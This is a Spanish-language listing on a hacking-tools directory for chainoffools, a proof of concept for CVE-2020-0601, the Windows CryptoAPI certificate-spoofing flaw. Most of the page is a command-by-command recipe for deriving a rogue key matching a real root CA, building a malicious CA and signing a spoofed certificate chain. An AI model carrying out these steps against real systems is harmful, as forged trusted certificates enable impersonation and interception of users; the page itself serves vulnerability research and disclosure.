Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
chainoffools — Una PoC para CVE-2020-0601 | Kitploit
Herramientas/GitHubGitHub/kudelskisecurity/chainoffools
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónCriptografíaPruebas de Penetración
GitHubkudelskisecurity/chainoffools

chainoffools

Una PoC para CVE-2020-0601

Ver Repositorio
33581hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CryptoAPI

CVE-2020-0601: Explotación de la vulnerabilidad de suplantación de CryptoAPI de Windows. Más información en nuestro artículo de blog.

Requisitos de instalación

root@kitploit:~
pip install -U -r requirements.txt

La generación de certificados funciona con OpenSSL versión hasta 1.0.2u.

Certificado CA

Usamos la Autoridad de Certificación USERTrust ECC pero puede ser cualquier certificado raíz que funcione en la curva P-384.

Para generar una clave privada que coincida con la clave pública del certificado raíz, usamos el script gen-key.py (funciona con Python 3.6 y superior):

root@kitploit:~
$ ./gen-key.py RootCert.pem 

La clave se puede mostrar con:

root@kitploit:~
$ openssl ec -in p384-key-rogue.pem -text

Luego, para generar el CA malicioso:

root@kitploit:~
$ openssl req -key p384-key-rogue.pem -new -out ca-rogue.pem -x509 -config ca.cnf -days 500

Luego generamos la siguiente clave privada y certificado:

root@kitploit:~
openssl ecparam -name prime256v1 -genkey -noout -out prime256v1-privkey.pem

openssl req -key prime256v1-privkey.pem -config openssl.cnf -new -out prime256v1.csr

openssl x509 -req -in prime256v1.csr -CA ca-rogue.pem -CAkey p384-key-rogue.pem -CAcreateserial -out client-cert.pem -days 500 -extensions v3_req -extfile openssl.cnf 

Finalmente, para tener la cadena completa en un solo archivo, concatenamos el CA y los certificados del servidor:

root@kitploit:~
cat client-cert.pem ca-rogue.pem > cert.pem
Descargar herramienta